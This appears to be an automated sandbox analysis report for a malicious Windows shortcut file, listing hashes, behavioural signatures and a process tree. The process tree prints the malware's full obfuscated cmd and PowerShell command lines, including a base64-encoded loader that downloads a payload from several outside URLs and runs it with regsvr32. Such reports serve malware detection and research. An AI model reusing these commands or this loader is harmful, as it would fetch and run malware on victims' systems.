Analysis
max time kernel: 150s
max time network: 155s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-11-2024 21:38
Static task: static1
Behavioral task: behavioral1
  Sample: ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
  Resource: win10v2004-20241007-en
General
Target: ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
Size: 2KB
MD5: e567fd6bd2ad541ea7cff36788a1cb04
SHA1: 335983d1da7118026ec9cb6befd1cbd3a84edf9b
SHA256: ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b
SHA512: fba256493c808dfae95cac6282f23ec756ce1d6b9ee7fe3ad8f70d43dce4569a3830467c4d30d6d2fac8479497a819c186a997b70ce84ab444f66bc4334cf67c
Malware Config
Signatures
Blocklisted process makes network request (19 IoCs)
Processes:
  powershell.exe (PID 3672), network flows 8, 13, 22, 23, 25, 28, 31, 34, 39, 40, 41, 44, 45, 46, 48, 53, 54, 57, 58
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation
  Process: cmd.exe
An obfuscated cmd.exe command-line is typically used to evade detection. (1 IoC)
Processes:
  cmd.exe (PID 4276)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  powershell.exe (PID 3672)
  powershell.exe (PID 3672)
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  Token: SeDebugPrivilege, powershell.exe (PID 3672)
Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
  description                        pid   Process         procid_target
  PID 804 wrote to memory of 4276    804   cmd.exe         84
  PID 804 wrote to memory of 4276    804   cmd.exe         84
  PID 4276 wrote to memory of 3672   4276  cmd.exe         85
  PID 4276 wrote to memory of 3672   4276  cmd.exe         85
  PID 3672 wrote to memory of 1712   3672  powershell.exe  95
  PID 3672 wrote to memory of 1712   3672  powershell.exe  95
Processes
1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   PID: 804
   2. C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /v:on /c Vy+KY28nm8jrFR/pN6hHEEnR9ZQSXCM52YkkW9kA5wMTB3nmG+JcpYgkGoLMzE+MnYyHqio9||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='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';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - Suspicious use of WriteProcessMemory
      PID: 4276
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell.exe -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
         - Blocklisted process makes network request
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
         PID: 3672
         4. C:\Windows\system32\regsvr32.exe
            Command line: "C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IwnMs\cHKEstjhfJ.uDD
            PID: 1712
Network
MITRE ATT&CK Enterprise v15
Downloads
Download 1
  Filesize: 1KB
  MD5: 9e9b48ae75ae39fd45ebf6799c9668d8
  SHA1: 7ed5cac9a268359ac09719dbbf354a83c23b1236
  SHA256: bd19fca5c89301abcf7cceaa75294bc7981f1a4bea7ffeb29260c9716960f761
  SHA512: c4b49773eba7ac113669f30444142bfb830b51f577795bcce45ebe382271f2f07a785fe47d10b5d18817e13bb7551563814552d174eee9f6e6f08c448ab31723
Download 2
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82